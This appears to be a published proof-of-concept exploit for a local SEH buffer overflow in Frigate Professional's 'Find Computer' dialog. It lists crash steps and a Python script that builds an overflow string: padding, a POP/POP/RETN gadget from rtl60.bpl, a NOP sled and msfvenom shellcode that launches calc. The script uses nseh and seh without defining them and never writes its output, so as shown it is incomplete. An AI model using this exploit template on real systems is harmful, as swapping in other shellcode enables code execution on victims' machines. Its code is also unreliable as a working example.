# Exploit Title: Frigate Professional - 'Find Computer' Local Buffer Overflow (SEH) (PoC)
# Vendor Homepage: http://www.frigate3.com/
# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-04
# Vulnerable Software: Frigate Professional
# Version:
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: FrigateLCE.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for Frigate3.exe
# 4.- Open "Frigate3.exe"
# 5.- Go to "Disk" > Find Computer
# 6.- Paste ClipBoard into the "Computer Name:" field
# 7.- Click on OK
# 8.- Calc.exe runs
#Python "FrigateLCE.py" Code:
f= open("FrigateLCE.txt", "w")
junk="A" * 4112
#40010C4B 5B POP EBX
#40010C4C 5D POP EBP
#40010C4D C3 RETN
#POP EBX ,POP EBP, RETN | [rtl60.bpl](C:\Program Files\Frigate3\rtl60.bpl)
nops="\x90" * 50
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d"-f python
buf =""
buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18"
buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f"
buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63"
buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5"
buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac"
buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee"
buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21"
buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc"
buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb"
buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33"
buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae"
buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f"
buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10"
buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6"
buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1"
buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05"
payload = junk + nseh + seh + nops + buf